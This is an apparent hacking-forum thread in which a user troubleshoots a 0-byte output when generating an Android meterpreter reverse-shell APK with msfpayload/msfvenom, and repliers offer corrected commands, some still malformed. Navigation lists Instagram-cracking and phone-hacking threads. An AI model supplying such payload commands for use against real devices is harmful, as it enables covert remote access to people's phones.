Hi guys first thx to all who help me alot i have a simple problem with my msfvenom when i create my payload
msfpayload android/meterpreter/reverse_tcp LHOST=my ip LPORTmy port R > /root/name.apk
the seize of payload after create is 0 buyte
can any one eplain to me why and how to fix this problem btw i use backbox os
Forum Thread: [UNSOLVED] Msfvenom Android Payload Problem
- Hot
- Active
-
Forum Thread: How to Track Who Is Sms Bombing Me . 4 Replies
1 mo ago -
Forum Thread: Removing Pay-as-You-Go Meter on Loan Phones. 1 Replies
2 mo ago -
Forum Thread: Hydra Syntax Issue Stops After 16 Attempts 3 Replies
2 mo ago -
Forum Thread: moab5.Sh Error While Running Metasploit 17 Replies
3 mo ago -
Forum Thread: Execute Reverse PHP Shell with Metasploit 1 Replies
4 mo ago -
Forum Thread: Install Metasploit Framework in Termux No Root Needed M-Wiz Tool 1 Replies
5 mo ago -
Forum Thread: Hack and Track People's Device Constantly Using TRAPE 35 Replies
5 mo ago -
Forum Thread: When My Kali Linux Finishes Installing (It Is Ready to Boot), and When I Try to Boot It All I Get Is a Black Screen. 8 Replies
6 mo ago -
Forum Thread: HACK ANDROID with KALI USING PORT FORWARDING(portmap.io) 12 Replies
6 mo ago -
Forum Thread: Hack Instagram Account Using BruteForce 208 Replies
7 mo ago -
Forum Thread: Metasploit reverse_tcp Handler Problem 47 Replies
9 mo ago -
Forum Thread: How to Train to Be an IT Security Professional (Ethical Hacker) 22 Replies
9 mo ago -
Metasploit Error: Handler Failed to Bind 41 Replies
9 mo ago -
Forum Thread: How to Hack Android Phone Using Same Wifi 21 Replies
9 mo ago -
How to: HACK Android Device with TermuX on Android | Part #1 - Over the Internet [Ultimate Guide] 177 Replies
9 mo ago -
How to: Crack Instagram Passwords Using Instainsane 36 Replies
9 mo ago -
Forum Thread: How to Hack an Android Device Remotely, to Gain Acces to Gmail, Facebook, Twitter and More 5 Replies
10 mo ago -
Forum Thread: How Many Hackers Have Played Watch_Dogs Game Before? 13 Replies
10 mo ago -
Forum Thread: How to Hack an Android Device with Only a Ip Adress 55 Replies
11 mo ago -
How to: Sign the APK File with Embedded Payload (The Ultimate Guide) 10 Replies
11 mo ago
-
How To: Find Identifying Information from a Phone Number Using OSINT Tools
-
How To: Use Burp & FoxyProxy to Easily Switch Between Proxy Settings
-
How to Hack Wi-Fi: Stealing Wi-Fi Passwords with an Evil Twin Attack
-
How To: Find Vulnerable Webcams Across the Globe Using Shodan
-
How to Hack Wi-Fi: Cracking WEP Passwords with Aircrack-Ng
-
How To: Make Your Own Bad USB
-
Steganography: How to Hide Secret Data Inside an Image or Audio File in Seconds
-
How To: Check if Your Wireless Network Adapter Supports Monitor Mode & Packet Injection
-
How To: Hack Like It's 1987 (An Introduction to the Telehack Retro Game)
-
How To: Write an XSS Cookie Stealer in JavaScript to Steal Passwords
-
How to Hack Wi-Fi: Cracking WPA2-PSK Passwords Using Aircrack-Ng
-
How To: Use Kismet to Watch Wi-Fi User Activity Through Walls
-
Hack Like a Pro: How to Find Directories in Websites Using DirBuster
-
How To: Use SpiderFoot for OSINT Gathering
-
How To: Extract Bitcoin Wallet Addresses & Balances from Websites with SpiderFoot CLI
-
Android for Hackers: How to Turn an Android Phone into a Hacking Device Without Root
-
How To: Stealthfully Sniff Wi-Fi Activity Without Connecting to a Target Router
-
Become an Elite Hacker Part 4: Hacking a Website. [Part 1]
-
How To: Crack SSH Private Key Passwords with John the Ripper
-
How To: Automate Wi-Fi Hacking with Wifite2
4 Responses
Intead of msfpayload you should use:
msfvenom -p android/meterpreter/reversetcp LHOST=yourip LPORT= your_port R > /root/name.apk
And it doesnt matter what os you are using. Msf is same everywhere :) good luck
yeah thx it's work fine but when i install it in my phone there's a problem look at this
https://null-byte.wonderhowto.com/forum/decrypt-android-payload-0175188/
i use this but same the seize is 0 byte of the payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=my ip LPORTmy port R > /root/name.apk
you have to update your metasploit to last version then run thin
msfvenom -p android/meterpreter/reverse_http HOST=my ip LPORTmy port 0 /root/name.apk
Share Your Thoughts